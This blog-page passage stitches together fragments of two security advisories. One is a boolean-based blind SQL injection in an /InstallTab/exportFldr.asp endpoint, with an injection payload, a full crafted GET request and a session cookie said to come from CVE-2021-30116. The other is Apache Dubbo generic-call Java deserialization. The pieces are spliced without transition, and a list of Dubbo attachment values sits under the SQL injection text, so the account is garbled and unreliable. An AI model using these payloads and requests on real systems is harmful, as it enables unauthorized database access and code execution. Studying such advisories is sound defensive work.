SNIP- ``` However when fldrId is set to ‘(SELECT (CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END))’ the request is allowed. Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/html Charset=Utf-8 Date: Thu, 19:12:11 GMT Strict-Transport-Security: max-age=63072000 includeSubDomains Connection: close Content-Length: 881 Whoops. Detailed description - Given the following request: ``` GET /InstallTab/exportFldr.asp?fldrId=1’ HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh Intel Mac OS X 10.16 rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml q=0.9,image/webp,*/* q=0.8 Accept-Language: en-US,en q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA sessionId=30548861 agentguid=840997037507813 vsaUser=scopeId=3&roleId=2 webWindowId=59091519 ``` Where the sessionId cookie value has been obtained via CVE-2021-30116. The API call /InstallTab/exportFldr.asp is vulnerable to a semi-authenticated boolean-based blind SQL injection in the parameter fldrId. The possible values are: - true - raw.return - nativejava - bean - protobuf-json An attacker can control this RPC attachment and set it to nativejava to force the java deserialization of the byte array located in the third argument. In addition, the caller also needs to set an RPC attachment specifying that the call is a generic call and how to decode the arguments. The signature for the $invoke or $invokeAsync methods is Ljava/lang/String [Ljava/lang/String [Ljava/lang/Object where the first argument is the name of the method to invoke, the second one is an array with the parameter types for the method being invoked and the third one is an array with the actual call arguments. These invocations are handled by the GenericFilter which will find the service and method specified in the first arguments of the invocation and use the Java Reflection API to make the final call. Apache Dubbo prior to 2.6.9 and 2.7.9 by default supports generic calls to arbitrary methods exposed by provider interfaces.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |